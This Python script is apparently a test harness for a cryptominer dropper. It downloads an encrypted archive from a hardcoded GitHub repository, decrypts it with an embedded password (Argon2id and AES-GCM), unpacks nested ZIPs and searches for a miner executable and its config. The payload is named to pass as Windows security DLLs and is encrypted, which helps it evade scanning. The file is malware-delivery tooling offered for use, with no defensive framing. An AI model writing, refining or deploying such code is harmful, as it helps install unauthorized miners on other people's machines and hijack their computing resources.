import os, sys, tempfile, zipfile, io
import urllib.request, urllib.error, ssl, urllib.parse, json
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.argon2 import Argon2id
from cryptography.hazmat.backends import default_backend

# ==================== CONFIGURATION ====================
REPO_BASE = "https://github.com/ivanban789/bom"   # ← CHANGE THIS
BRANCH = "auto"                                    # "auto", "main", "master", etc.
ENCRYPTED_FILENAME = "8bf2d77c9745_windows security dlls.zip.enc"
PASSWORD = "SHADOWwolf12"
MINER_EXE_NAME = "who my pie.exe"                 # inside the ZIP (case insensitive)
# =======================================================

def get_default_branch(repo_path):
    """Return the default branch of a public GitHub repo."""
    api_url = f"https://api.github.com/repos/{repo_path}"
    try:
        req = urllib.request.Request(api_url, headers={'User-Agent': 'Mozilla/5.0'})
        with urllib.request.urlopen(req, timeout=10, context=ssl.create_default_context()) as resp:
            data = json.loads(resp.read().decode())
            return data.get('default_branch', 'main')
    except Exception as e:
        print(f"[!] Could not detect branch: {e}")
        print("[!] Falling back to 'main'")
        return 'main'

def recursive_unzip(root_dir):
    """Extract all .zip files inside root_dir. Stops if a file is broken."""
    while True:
        zip_files = []
        for dirpath, _, filenames in os.walk(root_dir):
            for fn in filenames:
                if fn.lower().endswith('.zip'):
                    zip_files.append(os.path.join(dirpath, fn))
        if not zip_files:
            break

        for zp in zip_files:
            try:
                # target folder = file name without .zip
                extract_to = os.path.splitext(zp)[0]

                # If a file (not a folder) with that name exists, remove it.
                if os.path.isfile(extract_to):
                    os.remove(extract_to)

                os.makedirs(extract_to, exist_ok=True)
                with zipfile.ZipFile(zp, 'r') as zf:
                    zf.extractall(extract_to)
                os.remove(zp)
                print(f"   -> Extracted nested archive: {os.path.basename(zp)}")
            except Exception as e:
                # On any failure, rename the zip so we don't try it again
                failed_path = zp + ".failed"
                try:
                    os.rename(zp, failed_path)
                    print(f"   [!] Failed to extract {zp}: {e} – renamed to {failed_path}")
                except Exception:
                    print(f"   [!] Failed to extract {zp}: {e} – could not rename")

def main():
    # ------------------- Build URL -------------------
    repo_path = REPO_BASE.rstrip('/').split('github.com/')[-1]
    branch = get_default_branch(repo_path) if BRANCH == "auto" else BRANCH
    miner_url = f"https://raw.githubusercontent.com/{repo_path}/{branch}/{urllib.parse.quote(ENCRYPTED_FILENAME)}"
    print("Download URL:")
    print(miner_url)
    print()

    # ------------------- Download --------------------
    print("[1/5] Downloading encrypted file...")
    try:
        req = urllib.request.Request(miner_url, headers={'User-Agent': 'Mozilla/5.0'})
        with urllib.request.urlopen(req, timeout=30, context=ssl.create_default_context()) as resp:
            encrypted_data = resp.read()
        print(f"      -> Downloaded {len(encrypted_data)} bytes.\n")
    except urllib.error.HTTPError as e:
        sys.exit(f"      ERROR: HTTP {e.code} - {e.reason}\n      Check filename/branch/repo privacy.\n")
    except Exception as e:
        sys.exit(f"      ERROR: Download failed - {e}\n")

    # ------------------- Decrypt --------------------
    print("[2/5] Decrypting...")
    if len(encrypted_data) < 44:
        sys.exit("      ERROR: File too short (need at least 44 bytes: 32 salt + 12 nonce).\n")

    salt = encrypted_data[:32]
    nonce = encrypted_data[32:44]
    ciphertext = encrypted_data[44:]

    try:
        kdf = Argon2id(
            salt=salt,
            length=32,
            memory_cost=64 * 1024,   # 64 MiB
            iterations=3,
            lanes=4,
            backend=default_backend()
        )
        key = kdf.derive(PASSWORD.encode('utf-8'))
        aesgcm = AESGCM(key)
        plaintext = aesgcm.decrypt(nonce, ciphertext, None)
        print(f"      -> Decryption successful! First bytes: {plaintext[:20].hex()}\n")
    except Exception as e:
        sys.exit(f"      ERROR: Decryption failed - {e}\n      Wrong password or corrupted file?\n")

    # ------------------- Validate ZIP ----------------
    print("[3/5] Validating ZIP...")
    try:
        with zipfile.ZipFile(io.BytesIO(plaintext)) as zf:
            bad_file = zf.testzip()
            if bad_file:
                sys.exit(f"      ERROR: ZIP is corrupt (first bad file: {bad_file})\n")
        print("      -> ZIP integrity OK.\n")
    except zipfile.BadZipFile:
        sys.exit("      ERROR: Decrypted data is not a valid ZIP file.\n")
    except Exception as e:
        sys.exit(f"      ERROR: {e}\n")

    # ------------------- Extract ---------------------
    print("[4/5] Extracting files...")
    temp_dir = tempfile.mkdtemp(prefix="miner_test_")
    try:
        with zipfile.ZipFile(io.BytesIO(plaintext)) as zf:
            zf.extractall(temp_dir)
        # Recursively unzip any nested archives
        recursive_unzip(temp_dir)
        print(f"      -> All files extracted to:\n      {temp_dir}\n")
    except Exception as e:
        sys.exit(f"      ERROR: Extraction failed - {e}\n")

    # ------------------- Search for miner & config ---
    print("[5/5] Searching for miner and config...")
    found_exe = None
    found_config = None
    for root, dirs, files in os.walk(temp_dir):
        for f in files:
            if f.lower() == MINER_EXE_NAME.lower():
                found_exe = os.path.join(root, f)
            elif f.lower() == "config.json":
                found_config = os.path.join(root, f)

    if found_exe:
        print(f"      -> Miner found: {found_exe}")
    else:
        print(f"      -> Miner '{MINER_EXE_NAME}' NOT found.")
    if found_config:
        print(f"      -> config.json found: {found_config}")
    else:
        print("      -> No config.json (dropper will generate one).")

    print("\n" + "="*60)
    print("Test finished. Extracted files are in:")
    print(temp_dir)
    print("Delete that folder when you're done.")

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        print(f"\n*** UNEXPECTED ERROR: {e} ***")
    finally:
        # Safe pause – works in terminal, does nothing if no console
        try:
            input("\nPress Enter to exit...")
        except (EOFError, OSError):
            pass
